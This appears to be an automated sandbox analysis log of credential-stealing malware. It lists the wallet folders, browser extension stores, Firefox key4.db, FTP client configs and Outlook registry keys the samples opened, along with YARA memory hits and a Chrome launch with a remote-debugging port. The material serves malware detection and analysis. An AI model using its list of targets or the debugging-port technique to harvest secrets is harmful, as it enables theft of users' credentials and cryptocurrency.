Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: number of queries: 1583
Source: Yara match File source: 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2879905773.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2797964606.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2892968437.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2877445648.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3095820288.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3094627589.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2904349240.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3094047183.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3096841796.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3095179623.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3079259497.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: Yara match File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C810C40 sqlite3_bind_zeroblob, 0_2_6C810C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C810D60 sqlite3_bind_parameter_name, 0_2_6C810D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C738EA0 sqlite3_clear_bindings, 0_2_6C738EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C810B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C810B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C736410 bind,WSAGetLastError, 0_2_6C736410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C736070 PR_Listen, 0_2_6C736070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6C73C050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73C030 sqlite3_bind_parameter_count, 0_2_6C73C030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7360B0 listen,WSAGetLastError, 0_2_6C7360B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C22D0 sqlite3_bind_blob, 0_2_6C6C22D0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0100EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 23_2_0100EC48
